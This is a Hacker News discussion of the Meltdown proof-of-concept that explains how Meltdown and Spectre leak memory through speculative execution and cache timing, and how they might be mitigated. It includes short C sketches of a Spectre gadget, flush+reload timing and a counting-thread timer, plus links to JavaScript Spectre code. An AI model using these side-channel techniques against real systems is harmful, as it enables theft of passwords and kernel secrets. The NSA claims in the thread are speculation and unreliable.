Meltdown Proof-of-Concept

github.com

760 points by __init 8 years ago · 186 comments

martin1975 8 years ago

I'm curious if someone can point me to any source that discusses how the next generation of CPUs that Intel, AMD, and ARM might be working on is actually going to address this & the Spectre issue architecturally. It's great that we have a potentially performance-killing fix, but the real "fix", or rather solution, is to alter the architecture. Since I'm not an EE/CE dude... is anyone aware of where such discussions on the WWW might be taking place?

by the way, that PoC was intense. Makes you wonder if the NSA knew about it all along :)

  • krylon 8 years ago

    > by the way, that PoC was intense. Makes you wonder if the NSA knew about it all along :)

    Colin Percival found a very similar issue with Intel's implementation of SMT on the Pentium 4 in 2005: http://www.daemonology.net/papers/htt.pdf

    So the general idea of using timing attacks against the cache to leak memory has been known for at least that long.

    In 2016, two researchers from the University of Graz gave a talk at the 33C3, where they showed that they had managed to use that technique to establish a covert channel between VMs running on the same physical host. They even managed to run ssh over that channel. https://media.ccc.de/v/33c3-8044-what_could_possibly_go_wron...

    In light of that, I would be surprised if the NSA had not known about this.

    • tptacek 8 years ago

      Can I put a plug in again for how fucking cool the Meltdown and Spectre attacks are? They're much more interesting than just cache timing, which, as you note, has been well-known for at least a decade (and much earlier in the covert channel literature).

      Unlike "vanilla" cache-timing attacks:

      * Meltdown and Spectre involve transient instructions, instructions that from the perspective of the ISA never actually run.

      * Spectre v1 undermines the entire concept of a bounds check; pre-Spectre, virtually every program that runs on a computer is riddled with buffer overreads. It's about as big a revelation as Lopatic's HPUX stack overflow was in 1995. There might not be a clean fix! Load fences after every bounds check? (A minimal sketch of the gadget shape follows below.)

      * Spectre v2 goes even further than that, and allows attackers to literally pick the locations target programs will execute from. Try to get your head around that: we pay tens of thousands of dollars for vulnerabilities that allow us to return to arbitrary program locations, and Spectre's branch target injection technique lets us use the hardware to, in some sense, do that to any program. And look at the fix to that: retpolines? Compilers can't directly emit indirect jumps anymore?

      It's good that we're all recognizing how big a problem cache timing is. It was for sure not taken as seriously as it should have been outside of a subset of cryptographers. But Meltdown and Spectre are not simply cache timing vulnerabilities; they're a re-imagining of what you can do to a modern ISA by targeting the microarchitecture.
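
      To make the v1 gadget shape concrete, here is a minimal sketch in C (all names and the probe-array layout are illustrative, not from any particular PoC; `_mm_lfence` is the x86 load-fence intrinsic from immintrin.h):

          #include <stdint.h>
          #include <stddef.h>
          #include <immintrin.h>

          uint8_t array1[16];
          size_t array1_size = 16;
          uint8_t array2[256 * 4096];   /* probe array: one page per possible byte value */
          uint8_t temp;                 /* sink so the compiler keeps the loads */

          /* If the branch is mispredicted, both loads still execute transiently,
           * leaving a line of array2 that encodes the secret byte in the cache. */
          void victim(size_t x) {
              if (x < array1_size) {
                  uint8_t secret = array1[x];    /* transient out-of-bounds read */
                  temp &= array2[secret * 4096]; /* secret-dependent cache footprint */
              }
          }

          /* The "load fence after every bounds check" idea: no dependent load
           * can issue until the check has actually resolved. */
          void victim_fenced(size_t x) {
              if (x < array1_size) {
                  _mm_lfence();
                  uint8_t secret = array1[x];
                  temp &= array2[secret * 4096];
              }
          }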

      • krylon 8 years ago

        > Can I put a plug in again for how fucking cool the Meltdown and Spectre attacks are?

        Yes, you can! :)

        I get your point. From the perspective of somebody who normally does not deal with such low-level affairs, the difference from prior cache-timing attacks is not /that/ obvious. It all looks like black magic to me, even now that I roughly understand how it works.

      • _wmd 8 years ago

        There's no reason to invent new terminology for speculative execution. Also, the mapping between the variety of CPU caches and real memory has been known to be imperfect since the beginning of time.

        But meanwhile, yes, can definitely agree how fucking cool it all is

        • tptacek 8 years ago

          What new terminology got invented?

          • _wmd 8 years ago

            Perhaps I've been living under a rock for the past 30 years, but transient instructions are a new idea for me

            • tptacek 8 years ago

              What's the "old" term for speculated instructions that aren't retired?

              • mehrdadn 8 years ago

                I've never heard of a term for them but I would find "speculated instructions" clear enough in context.

                • tptacek 8 years ago

                  "Speculated instructions" is ambiguous, because it includes instructions that are retired, and we specifically care about the ones that aren't.

    • chx 8 years ago

      > In light of that, I would be surprised if the NSA had not known about this.

      Call me a tinfoil-hat conspiracist, but the only rational explanation I can find for IBM POWER and z CPUs still being vulnerable to Spectre is the NSA forcing IBM not to fix it. I read somewhere that the z196 had three orders of magnitude more validation routines than the Intel Core at that time. It's extremely hard to believe they haven't caught this.

    • warkdarrior 8 years ago

      Cache timing attacks have been known for a while, for example across VMs in 2009: https://cseweb.ucsd.edu/~hovav/dist/cloudsec.pdf

      • ckastner 8 years ago

        This paper from 2005 describes a cache timing attack that enabled an unprivileged process to extract another process's AES key:

        https://www.cs.tau.ac.il/~tromer/papers/cache.pdf

        IIRC, the only way to address the issue was the addition of the AES-NI instruction set, which came a few years later.

        • cesarb 8 years ago

          > IIRC, the only way to address the issue was the addition of the AES-NI instruction set, which came a few years later.

          Another option would be to use a bitsliced implementation of AES, at some cost in speed. I could also imagine an implementation which read the whole table every time, using constant-time operations to select the desired element(s), but I don't know how slow that would be.

  • arkadiyt 8 years ago

    > Makes you wonder if the NSA knew about it all along :)

    Former head of TAO Rob Joyce said "NSA did not know about the flaw, has not exploited it and certainly the U.S. government would never put a major company like Intel in a position of risk like this to try to hold open a vulnerability." [1]

    Who knows if that's true or not, though. Certainly the U.S. government has done exactly that many times in the past (like with heartbleed).

    [1]: https://www.washingtonpost.com/business/technology/huge-secu...

    • SheinhardtWigCo 8 years ago

      It's odd to publicly state that they didn't know about it, because now if they don't do the same after the next big flaw comes out, the implication will be that they indeed knew and were quietly exploiting it. I thought that was why they generally don't comment on these things. The less-charitable assumption is that they'll make this claim every time regardless of whether it's true.

      The claim that "the U.S. government would never put a major company like Intel in a position of risk" is obviously bullshit. TAO's job necessarily involves exposing companies both in the US and overseas to that kind of risk on a daily basis.

      • arrestedDevelpr 8 years ago

        Implications? Who cares what the peanut gallery thinks?

      • dirtbox 8 years ago

        It's the type of announcement that makes me wonder if they had the chip makers incorporate it specifically for them to exploit.

        • mehrdadn 8 years ago

          > It's the type of announcement that makes me wonder if they had the chip makers incorporate it specifically for them to exploit.

          ...sorry, what?

          It makes you wonder if the NSA had chip makers incorporate speculative execution and caching because... timing attacks?

          • dirtbox 8 years ago

            No.

            It's just that it's highly suspicious that anyone is making any type of mention of it at all.

    • rdtsc 8 years ago

      That is an odd one. Why say that instead of the usual "we can't comment on that"?

      > U.S. government would never put a major company like Intel in a position of risk like this to try to hold open a vulnerability." [1]

      They subverted the Dual_EC_DRBG standardization process. Had they not been caught and had the algorithm ended up on more devices, they would have hurt not just major companies but whole industries.

      Also for reference: https://en.wikipedia.org/wiki/Bullrun_(decryption_program)

    • mpweiher 8 years ago

      <tinfoil>

      Note that it talks about "the flaw", whereas Intel claims it isn't a "flaw". So could be another instance of overly specific denial. "We didn't exploit this flaw, because it isn't a flaw. We exploited the processor operating as designed".

      </tinfoil>

    • arkh 8 years ago

      > the U.S. government would never put a major company like Intel in a position of risk like this to try to hold open a vulnerability

      The US government sure. The NSA? They sure would as this statement shows.

      • amdavidson 8 years ago

        Are you arguing that the NSA does not fall under the umbrella of the "US Government"?

  • white-flame 8 years ago

    To my understanding, the memory subsystem is fetching a byte in parallel with access permission checks. If the byte is discarded due to mis-speculation, then the result of the permission check is ignored, but the cache is still in an updated state.

    I believe one solution would be to put permission checks before the memory access, which would add serialized latency to all memory accesses. Another would be to have the speculative execution system flush cache lines that were loaded but ultimately ignored, which would be complex but probably not as much of a speed hit.

    (edit: yeah, a simple "flush" is insufficient, it would have to be closer to an isolated transaction with rollback of the access's effects on the cache system.)

    • jimrandomh 8 years ago

      Flushing cache lines doesn't work, at least not straightforwardly. The attacker can arrange things so that the cache line is pre-populated with something else that it has access to, with a colliding address that will be evicted by the speculative load. Flushing undoes the load, but can't easily undo the eviction.
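
      To make the eviction concrete: the set an address lands in is chosen by a few address bits, so the attacker can pre-place a line whose set index collides with the secret-dependent load. A rough sketch, assuming a typical 32 KB, 8-way L1D with 64-byte lines (64 sets):

          #include <stdint.h>

          /* Which L1D set an address maps to, under the assumed geometry.
           * Any two addresses with equal bits 6..11 compete for the same
           * 8 ways, so the speculative load can evict the attacker's
           * pre-placed line; "flushing the loaded line" can't undo that. */
          static unsigned l1d_set(uintptr_t addr) {
              return (unsigned)((addr >> 6) & 63); /* drop 6 offset bits, keep 6 set bits */
          }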

    • tzs 8 years ago

      > I believe one solution would be to put permission checks before the memory access, which would add serialized latency to all memory access.

      I don't see why that would have to add latency to all (or any) memory access. The addresses generated by programs (except in real mode, when everything has access to everything anyway so we don't care about these issues then) are virtual addresses, so they have to be translated to get the actual memory address.

      The permission information for a page is stored in the same place as the physical address translation information for that page. The processor fetches it at the same time it fetches the physical base address of the page.

      They should also have the current permission level of the program readily available. That should be enough to let them do something about Meltdown without any performance impact. They could do something as simple as if the page is a supervisor page and the CPU is not in supervisor mode don't actually read the memory. Just substitute fixed data.

      Note that AMD is reportedly not affected by Meltdown. From what I've read that is because they in fact do the protection check before trying to access the memory, even during speculation, and they don't suffer any performance loss from that.

      Note that since Meltdown is only an issue when the kernel memory read is on the path that does NOT become the real path (because if it becomes the real path, then the program is going to get a fault anyway for an illegal memory access), the replacing of the memory accesses with fixed data cannot harm any legitimate program.

      Spectre is going to be the hard one for the CPU people to fix, I think. I think they may have to offer hardware memory protection features that can be used in user mode code to protect parts of that code from other parts of that code, so that things that want to run untrusted code in a sandbox in their own processes can do so in a separate address space that is protected similar to the way kernel space is protected from user space.

      It may be more complicated than that, though, because Spectre also does some freaky things that take advantage of branch prediction information not being isolated between processors. I haven't read enough to understand the implications of that. I don't know if that can be defeated just by better memory protection enforcement.

      • ahh 8 years ago

        > I don't see why that would have to add latency to all (or any) memory access. The addresses generated by programs (except in real mode, when everything has access to everything anyway so we don't care about these issues then) are virtual addresses, so they have to be translated to get the actual memory address.

        L1 caches are generally virtually indexed for exactly this reason: to allow a L1 cache read to happen in parallel with the TLB lookup. (They're also usually, I believe, physically tagged, so we have to check for collisions at some point, but making sure there's no side channel information at that point is, obviously given recent events, hard.)

      • tomatocracy 8 years ago

        Indeed - Meltdown has an "easy" fix and now it's known it should be possible to design chips which are not vulnerable.

        Spectre is, as you say, harder - but more because the line of what sort of state should be separate isn't as clear-cut as we might like it to be (i.e. it's not necessarily just "processes" as the OS sees it - e.g. JVM/JavaScript interpreter state should allow for an effective sandbox between the executing interpreter/JVM process and what the running JVM/JavaScript code can see). And worse, those are precisely the cases where one probably cares most about separation, given that's where untrusted code is typically run.

        But hardware assistance could help - in simple terms, I'd imagine that allowing a swap out of more of the internal processor state (to the extent that one process "training" the branch-predictor doesn't impact how the branch predictor acts in another process) would be pretty effective. That might be expensive in terms of performance per-transistor/per-watt however (though probably not absolute performance).

        • tsukikage 8 years ago

          If we're looking at hardware design changes, it really feels like what we actually need is a place to hold a nonce that the OS/hypervisor can set per-process/per-VM, and to incorporate those bits in the CPU cache tags so cache lines never match across security boundaries, which would close the side channel used to exfiltrate information.
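
          In software terms the proposal is just a wider tag compare; a toy model of the idea (purely illustrative, not any real microarchitecture):

              #include <stdint.h>
              #include <stdbool.h>

              /* Toy model: each cache line's tag carries a nonce written by the
               * OS/hypervisor on context or VM switch. A lookup only hits when
               * both the address tag and the current domain's nonce match, so a
               * line filled in one security domain can never be observed from
               * another. */
              struct cache_tag {
                  uint64_t addr_tag;
                  uint16_t domain_nonce;
              };

              static bool tag_hit(struct cache_tag line, uint64_t addr_tag,
                                  uint16_t current_nonce) {
                  return line.addr_tag == addr_tag && line.domain_nonce == current_nonce;
              }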

    • thisoneforwork 8 years ago

      Would "flushing on ignore" not leave the cache side channel open for many instructions before the abort?

    • martin1975 8 years ago

      the first approach sounds kind of expensive to be done at the cpu level. I like your second one better. thank you!

      • dannyw 8 years ago

        AMD already takes the first approach to prevent Meltdown.

      • white-flame 8 years ago

        Actually, my preferred solution would be to eliminate the notion of distributing machine code binaries entirely, but that's a bit beyond the scope of these discussions. ;-)

        • martin1975 8 years ago

          so run everything in a VM?

          • white-flame 8 years ago

            No, creating a block of machine code bytes to execute would be a privileged operation. All code would run through a privileged CPU-specific compiler first, and there'd be no way to run raw machine code bytes otherwise.

            If there are bugs that can be exposed through various machine code patterns, the compiler can centralize the restrictions of what may be executed, enforce runtime checks, or prevent certain instructions from being used at all. Security or optimization updates would affect all running programs automatically. Granted, these current speculative vulnerabilities would be much more difficult to statically detect.

            But it would follow the crazy gentoo dream of having everything optimized for your environment better, allow much better compatibility across systems, and prevent entire classes of privilege escalation issues.

            • Terr_ 8 years ago

              > no way to run raw machine code bytes otherwise [...] restrictions of what may be executed, enforce runtime checks, or prevent certain instructions from being used at all [...] everything optimized for your environment better, allow much better compatibility across systems and prevent entire classes of privilege escalation issues.

              So... basically re-inventing Java? :)

              "Raw machine code bytes" aren't distributed but occur through the privileged JVM and its just-in-time compiler, the byte-code verifier enforces restrictions on what data-access patterns and where instructions can be used, the JVM for a particular OS has optimizations for that environment, and sandboxing (while imperfect) blocks some classes of privilege escalation issues.

              Don't get me wrong, I'm not saying Java is perfect or that the underlying goal isn't good, I'm just happily amused by this sense of "everything old is new again."

              • white-flame 8 years ago

                Well, to me Java is still new tech. ;-) But yes, it's certainly a reasonable sampling into non-machine code distribution, and enforcement of security rules when actually running/JITting the code, as were some mainframe developments before then.

                Of course, Java certainly does have some higher level weaknesses as in the introspection API kerfuffle a while back, and is too locked into its Object Obsessed design for it to be a truly general purpose object code format.

              • londons_explore 8 years ago

                Arguably x64 assembly code is the same...

                A privileged process (the microcode) enforces restrictions and converts it to micro-ops which execute on the real processor.

            • dreish 8 years ago

              I've been thinking along the same lines for the last few years. If you did this, you could have a multi-user operating system in a single address space and avoid the cost of interrupts for system calls (which would just be like any other function call).

            • mykull 8 years ago

              We'd need a better binary representation of uncompiled code, then. Moving around lots of code as ASCII is kind of suboptimal... I wouldn't want that. By all means, show it as text to the user, but don't store it that way.

            • martin1975 8 years ago

              and what if I wrote a compiler that doesn't heed any of your security concerns? It would still compile to machine code and continue to be able to exploit things Spectre/Meltdown style? Or am I off here?

              • white-flame 8 years ago

                You'd only be able to run it on your system. At least, without other means of breaching the low level secured configuration of someone else's machine, because that's where the One True Compiler for that system lives.

              • gumby 8 years ago

                If I were taking this approach I might not even tell you the instruction set of the machine, so your compiler wouldn’t be useful.

              • XorNot 8 years ago

                I think the idea is you just never accept foreign machine code.

            • martin1975 8 years ago

              cool .. I think I get it. It's like compiler/instruction based DRM ... CPU specific permission to run code. Maybe they can leverage existing TPM chips to do this...

              I just don't want to see performance being decimated as a trade off for security, if at all possible.

      • spullara 8 years ago

        I'm not so sure. Memory accesses are so slow (hundreds of cycles) that it probably wouldn't be much slower to issue them a few instructions later. When this optimization was introduced, memory access times and cycle times were much closer together, only a few cycles apart, and it saved a huge amount of time.

        • gpderetta 8 years ago

          Main memory accesses take on the order of a hundred cycles. An L1D cache hit usually takes 3-4 cycles. Microarchitecture designers will make heroic efforts to shave even a single cycle here. Adding an overhead of even a couple of cycles would be a huge deal.

          Having said that, AMD CPUs are the existence proof that you can be immune to meltdown with no significant overhead.

          Spectre is a completely different issue though.

          • londons_explore 8 years ago

            AMD CPUs have pretty poor single threaded performance.

            Perhaps that's because they haven't taken the speed short-cuts that Intel took...?

            • jandrese 8 years ago

              Didn't Ryzen close the single thread performance gap quite a bit?

              But yeah, protecting against it means implementing memory protection in more places in the CPU. More gates and the possibility of becoming a bottleneck.

            • arcticbull 8 years ago

              With Ryzen, they're pretty much equal on an IPC basis.

  • thisoneforwork 8 years ago

    Not a CPU designer, but my guess is that they will move the cache management logic from the MMU to the µOP scheduler, which will commit to cache on retirement of the speculatively executed instruction. They would then need to introduce some sort of L0 cache, accessible only at the microarchitectural level, bound to a speculative flow, and flushed at retirement.

    • sspiff 8 years ago

      How does this work for two instructions in the pipeline at the same time that refer to the same cache line? If the second instruction executes the read phase before the first is retired/committed to cache, you would be hit by two memory fetch latencies, significantly hurting performance.

      I guess compilers could pad that out with no-ops to postpone the read until the previous commit is done, if they know the design of the pipeline they are targeting. But generically optimized code would take a terrible hit from this.

      • thisoneforwork 8 years ago

        Firstly, thanks for the question. As mentioned, not a CPU designer or trying to teach Intel what to do. More like relying on the hive mind to see if I have the right idea.

        A second instruction in the pipeline would read from the above mentioned L0 cache (let us call it load buffer), much like it would for tentative memory stores from the store buffer.

        Also, two memory fetches in parallel are not twice as long as a memory fetch, if that would be the solution (which I guess would not be the case, as I imagine race conditions appearing)

        • foota 8 years ago

          I don't think you can allow two speculatively executing instructions to read from the same L0 cache.

          For example, say the memory address you want to check for being cached is either 0x100 or 0x200 (not realistic addresses, but they work for the example) based on some kernel memory bit. Then run instructions in userspace that try to fetch 0x100 (with flushes in between). If you notice one that completes quickly, then it must have used the value at 0x100 cached in the L0 cache by the kernel? (And also run over 0x200 to check when it's cached in L0.)

          • nialv7 8 years ago

            L0 is only used by speculatively executed uOPs, before they are actually committed. Therefore anything that reads from L0 has to be speculatively executed too.

            So if the uOP that populated the L0 was reading from kernel memory, then it won't be committed. And subsequent uOPs that read from the L0 won't be committed either. So you can't get timing information from them.

            • foota 8 years ago

              But if another instruction reads from the same cache then that one could retire.

  • woliveirajr 8 years ago

    I'm curious how Transmeta chips [0] would have suffered from/been unaffected by such exploits. Being a CPU that runs CPU microcode, the patch would probably be easier, if necessary at all.

    [0] https://en.wikipedia.org/wiki/Transmeta

  • chacham15 8 years ago

    There was an HN article a while ago that discussed making use of an existing CPU ISA extension to solve the problem in a performant manner: PCID. More here: http://archive.is/ma8Iw

  • cm2187 8 years ago

    By the way, I understand the fixes are being rolled out now. Do we have a more precise idea of the performance hit on windows and linux?

runesoerensen 8 years ago

The Project Zero bug report (with PoCs/timeline) was also made public a few minutes ago https://bugs.chromium.org/p/project-zero/issues/detail?id=12...

kodablah 8 years ago

This was the GitHub repo mentioned in the meltdown.pdf that was 404'ing until now. We have native Spectre replication code too. What still seems to be elusive is the JS-based Spectre impl (probably waiting at least for Chrome 64, though I confirmed via https://jsfiddle.net/5n6poqjd/ that Chrome seems to have disabled SharedArrayBuffer even before they said they would, which wasn't the case a few days ago).

  • diyseguy 8 years ago

    This is the closest thing to a javascript implementation I have seen: http://xlab.tencent.com/special/spectre/js/check.js

    from: http://xlab.tencent.com/special/spectre/spectre_check.html

    • kodablah 8 years ago

      Nice. Reviewing the code, it is as the PDF said: they are just constantly incrementing a value in the shared buffer to get a fairly precise timer. It then seems to use that timing to check for cache hits across 256 indices (99 tries per check). So just removing this timer is not enough; it just increases the surface area of bytes you have to read and sift through to see if you have other memory? Anyone have a writeup on this?
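
      For anyone unfamiliar with the counting-thread trick, the same idea is easy to sketch natively; a rough pthreads illustration (my own sketch, not the Tencent code):

          #include <pthread.h>
          #include <stdint.h>

          /* A "clock" made from a thread that does nothing but increment a
           * shared counter. Sampling `ticks` before and after a probe load
           * gives a timer fine-grained enough to tell a cache hit from a
           * miss, which is why coarsening performance.now() alone doesn't
           * close the channel. */
          static volatile uint64_t ticks;

          static void *counter_thread(void *arg) {
              (void)arg;
              for (;;)
                  ticks++;
              return NULL;
          }

          /* usage sketch: t0 = ticks; (void)*probe_addr; delta = ticks - t0; */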

      • JonathonW 8 years ago

        Isn't the high-precision timer required to detect a cache hit or miss-- as in, the side channel being exploited here is in the timing of a cache hit or miss; there's no data leaked directly into Javascript?

        That's not to say that removing SharedArrayBuffer (and high-precision performance timers, which were removed a couple years back to mitigate some other timing-related vulnerabilities) is enough to completely eliminate Spectre; there might be other methods that can time accurately enough to reveal information.

        (I might be completely wrong here, but this is my current understanding of the situation, at least.)

    • mwambua 8 years ago

      Nice tool. Sadly, it reports that my browser (Chromium 63.0.3239.132 with strict site isolation (chrome://flags/#enable-site-per-process) enabled) is vulnerable to Spectre. Do you know if there are any other steps that I can take to secure myself aside from using Firefox?

      • btb 8 years ago

        I'm running the same version of Chrome (with site isolation enabled), and it's reporting "Your browser is NOT VULNERABLE to Spectre" for me. Also in incognito mode with extensions disabled.

        • mwambua 8 years ago

          Thanks! It reports the same thing for me too now. I had to enable Top document isolation (chrome://flags/#enable-top-document-isolation) as well.

    • gadgetoid 8 years ago

      Found this earlier today via GitHub search: https://github.com/cgvwzq/spectre/blob/master/spectre.js

    • dingo_bat 8 years ago

      Interesting that Firefox on my phone is shown vulnerable but Samsung browser is not.

thebeardedone 8 years ago

Moritz Lipp's Twitter is actually interesting to follow. He is reconstructing images that do not fit into the cache. Quite amazing.

https://twitter.com/mlqxyz/status/950378419073712129

(I personally do not have a twitter account but was looking for the paper and stumbled upon it, glad I did!)

trendia 8 years ago

Linux 4.15 and the appropriate modules protect against the attack.

To test, set CONFIG_PAGE_TABLE_ISOLATION=y. That is:

    sudo apt-get build-dep linux
    sudo apt-get install gcc-6-plugin-dev libelf-dev libncurses5-dev
    cd /usr/src
    wget https://git.kernel.org/torvalds/t/linux-4.15-rc7.tar.gz
    tar -xvf linux-4.15-rc7.tar.gz
    cd linux-4.15-rc7
    cp /boot/config-`uname -r` .config            # start from the running kernel's config
    make CONFIG_PAGE_TABLE_ISOLATION=y deb-pkg    # build .deb packages with KPTI enabled
  • noobermin 8 years ago

    I have CONFIG_PAGE_TABLE_ISOLATION on. I roll my own kernel and all that.

    Trying the kaslr program right now, it's not figuring out the direct map offset and it's probably already been a minute or two. So it works?

    EDIT: After 40 minutes, it has attempted all addresses and did not find the direct map offset.

    • trendia 8 years ago

      It took about an hour for it to find the offset for me.

      I think that the page isolation slows it down, even if it doesn't completely eliminate it.

      The second test had something like a 0.05% success rate on my PC, and took over an hour to get a few dozen values read.

      After trying this with the new kernel, I started up an AWS instance and ran the tests there. The first test (KASLR) succeeded within a few seconds, and the second test had a 100% success rate (read 1575 values in a few seconds).

      • noobermin 8 years ago

        Basically, the first test (kaslr.c) did not even work for me, and it scanned all addresses and wrapped around and started again.

        You probably know this (I saw you're the person I replied to initially), but for others reading: to check that it's enabled, "dmesg | grep isolation" should tell you whether page table isolation is on after you enable it in the kernel.

        Given the other tests require the offset, I think I'm safe? I'm going to run it again just to be sure.

  • Valmar 8 years ago

    Page Table Isolation has been backported to 4.14.12, so no need to test with the rc.

tptacek 8 years ago

libkdump is really clean code and worth a read, nicely wrapping the inline assembly you need to do the flush+reload and keeping the algorithms in pretty simple C. It's worth taking a few minutes to read through it.

This code is from TU Graz; I assume this is from Daniel Gruss's team, who participated in the original research.

samsonradu 8 years ago

High-level programmer here. Can someone please explain (I already read the ELI5 in previous threads) how the attacker extracts the actual data from the processor's L1 cache after tricking the branch prediction and having the CPU read from an unauthorized memory location?

I understand the "secret" data stays in the caches for a very short time until the branch prediction is rolled back, which makes this a timing attack, but I don't get how you actually read it.

EDIT

So perhaps someone can ELI5 me "4.2 Building a Covert Channel" [1] from the Meltdown paper which is what I didn't understand.

[1] https://meltdownattack.com/meltdown.pdf

  • alien_at_work 8 years ago

    Mostly a high-level programmer. I may be wrong, or be thinking of another recent attack, but my understanding was this: the attacker allocates 256 separate pages, ensures they're not in the cache, and then runs code like this:

        if(false_but_predictive_execution_cant_tell)
        {
          /* transient read of a protected kernel byte */
          int i = (int)*protected_kernel_memory_byte;
          /* touch page #i so it lands in the cache */
          load_page(i, my_pages);
        }

    Then it becomes a matter of checking the speed of reading from those pages. Whichever one reads back too fast to have been freshly loaded must correspond to the value read from protected memory.
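
    The speed check is typically a flush+reload measurement; a minimal sketch using GCC's x86 intrinsics (the ~200-cycle figure is a rough, machine-dependent assumption):

        #include <stdint.h>
        #include <x86intrin.h>   /* _mm_clflush, __rdtscp */

        /* Each probe page is flushed with _mm_clflush before the transient
         * code runs; afterwards, one load per page is timed. A latency far
         * below a memory round-trip (~200 cycles) means the line was
         * already in cache, i.e. the transient code touched that page. */
        static uint64_t access_time(volatile uint8_t *p) {
            unsigned aux;
            uint64_t t0 = __rdtscp(&aux);
            (void)*p;                     /* the timed load */
            return __rdtscp(&aux) - t0;
        }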
  • ajanuary 8 years ago

    Caveat: I am also a high level programmer.

    My understanding is that the problem is that the data in the cache _isn't_ rolled back.

    You fetch the secret data. You then fetch a different memory address based on the contents of the secret data, e.g. fetch((secret_bit * 128) + offset) [1], so if secret_bit is 0 it's fetched the memory at offset into the cache, and if secret_bit is 1 it's fetched the memory at offset+128 into the cache.

    After the speculative work is rolled back, the data that it fetched into the cache still remains. You then time how long it takes to fetch offset and offset+128. If offset comes back quickly, secret_bit was 0. If offset+128 comes back quickly, secret_bit was 1.

    _That_ is where the timing attack part comes in: "timing attack" refers to using measurements of how long something took to glean information, not that you need to do it quickly.

    [1] In reality you do it on the byte level and use &, but I wanted to keep it to guessing a single bit to make it simpler.

    • samsonradu 8 years ago

      > You fetch the secret data. You then fetch a different memory addressed based on the contents of the secret data ...

      I was under the impression that there is no interface to read data from the CPU caches and that the cache is managed by the CPU itself only.

      • ajanuary 8 years ago

        Right, which makes it a bit of a tricky attack to pull off. But if you know what you're doing you can do some operation that requires memory address x and be reasonably sure it will end up in the CPU cache. If you then do an operation on memory address x, and it happens really quickly, and you do an operation on memory address x+128, and it happens a bit slower, you can assume that x was in the cache and x+128 wasn't.

        • samsonradu 8 years ago

          Yes, I got the part where you can time if memory address X is in cache and X+128 isn't. But how does one read the data at memory address X?

          • ajanuary 8 years ago

            You load it into a register. If you're trying to drive it from a high level language, I guess you can do something like an add which will get compiled into instructions to load it into a register first.

  • PeterisP 8 years ago

    It does not "stays in the caches for a very short time until the branch prediction is rolled back", the core of the problem is that speculative instructions caused by out of order execution or branch prediction leave a side-effect (whether some memory location was fetched to cache or not) that can be read for a long time afterwards.

    The covert channel consists of a "sender" and a "receiver". The receiver can't extract contents of L1 cache, but it can detect which pages were in cache by timing differences. So the sender encodes the secret data by fetching particular addresses calculated so that the receiver can afterwards recover the secret by verifying which page(s) were in cache.

    In the Meltdown attack, the sender consists of instructions controlled by you - e.g. x=memory_you_shouldn't_access; y=array[1000*x] - and after an Intel processor notices that you shouldn't access that memory and rolls back the instructions (invalidating y and x), the 1000*x location was already pulled into cache, and you can check - is array[1000] cached? is array[2000] cached? is array[142000] cached? - to determine x.

    In the Spectre attack, the sender consists of code in the vulnerable application that happens to contain similar instructions. Spectre means that if your application anywhere contains code like if (parameter is in bounds) {x=array1[parameter]} (...possibly some other code...) y=array2[x], then any attacker that (a) runs on the same CPU and (b) can manipulate the parameter somehow can trick this code into speculatively executing the path "protected" by the if, revealing memory out of bounds of that array1. The difference from ordinary buffer overflow bugs is that code like that is normal, common and (in general) not a bug, since the instructions "don't get executed", and the vulnerability persists even if you validate all input.

krylon 8 years ago

I have run the first test on several machines, with mixed results, but on my workhorses (ThinkPad x220, Zenbook UX305) the exploit seems to work.

I thought the recent kernel/firmware/ucode patches should have prevented that.

EDIT: The other demos fail, though, as they should. sigh

EDIT: For some reason, demo #2 (breaking kaslr) works on my Ryzen machine, but not on the others. :-?

  • cookiecaper 8 years ago

    Spectre should work on most modern computers. There are no kernel patches in stable to prevent Spectre right now. Only Meltdown is mitigated by KPTI. The new Intel microcode and the kernel code to control it will propagate out in the next couple of weeks.

anonymousDan 8 years ago

Looks like Intel SGX is at least vulnerable to Spectre attacks too: https://github.com/lsds/spectre-attack-sgx

pbhjpbhj 8 years ago

First I'd read about this, so I thought "who's shorting Intel now, I wonder"; turns out it's the CEO [kinda]:

>"reports this morning that Intel chief executive Brian Krzanich made $25 million from selling Intel stock in late November, when he knew about the bugs, but before they were made public" (https://qz.com/1171391/the-intel-intc-meltdown-bug-is-hittin...)

I assume he's supposed to now be prosecuted, that sounds like insider dealing? [I'd like to say "will be prosecuted" but ...]

  • stefs 8 years ago

    As far as conspiracy theories go (I read that some days ago on reddit), he won't be prosecuted because he cooperates with the NSA. Refuse to cooperate with them and you join Nacchio and Qwest.

aeleos 8 years ago

I am running a Razer Blade 2017 with Ubuntu 16.04 and so far all of the PoCs have worked. I currently have my KASLR offset and I am now testing the reliability. So far it doesn't seem very good, with a 0.00% success rate at 60 reads. It did take a while to find my KASLR offset, with multiple passes through the entire randomization space, so I need to stress my CPU more in order to increase the rate of successful branch speculations.

  • jeshwanth 8 years ago

    I installed the recent kernel release from Ubuntu, but the tests are still working fine.

Uplink 8 years ago

Not sure what this means, but while I'm mining Monero on the CPU with xmr-stak the PoC is thwarted.

First, the "Direct physical map offset" comes back wrong in Demo #2. Second, if I use the correct offset, the reliability is around 0.5% in Demo #3 - but not consistently... after a few tries it did come back with >99%

Basically, screw up your caches continuously.

srcmap 8 years ago

From the papers, these two bugs are also exploitable on ARM.

Does it mean a hacked iOS/Android app can also (in theory) sniff the password entered in a system dialog, as demoed in the video?

   Realtime password input - https://www.youtube.com/watch?v=yTpXqyRYcBM
  • tptacek 8 years ago

    It depends. From what I'm reading: generally, with apparently one possible exception, Meltdown doesn't work on ARM. Generally, both variants of Spectre do.

  • gok 8 years ago

    Important to differentiate between ARM the company, the instruction set architecture(s) and the specific implementation of those ISAs. The licensable nature of ARM means there very likely are (possibly undiscovered) implementations of the ARM ISAs floating around which are susceptible to Meltdown.

    • palotasb 8 years ago

      I was under the impression that they generally license the IP cores (or at least some IP blocks) to implement the ISA and downstream vendors don't implement those differently.

Acen 8 years ago

macOS is yet to have a patch for 10.12.6 (Sierra) to resolve this.

rstuart4133 8 years ago

Does anyone have a link to Linux PoC code for Meltdown that uses speculative branch execution?

I've only seen two implementations: one based on just doing the access to kernel memory, catching the SIGSEGV, and then probing the cache. Obviously that could be closed by the kernel flushing the cache prior to handing control back to user space after a SIGSEGV. Doing that would have no impact on normal programs.

The second is by exploiting a bug in Intel's transactional memory implementation. But I assume Intel could turn that feature off, as they have done in the past. Since bugger-all programs use it, doing so wouldn't have much impact.

Which means the approach being taken now is done purely to kill the speculative branch method (ie, Spectre pointed at the kernel). The authors say it should work, but also say they could not make it work. I haven't been able to find any working PoC for my Linux machines.

So my question is: is there any out there?

VikingCoder 8 years ago

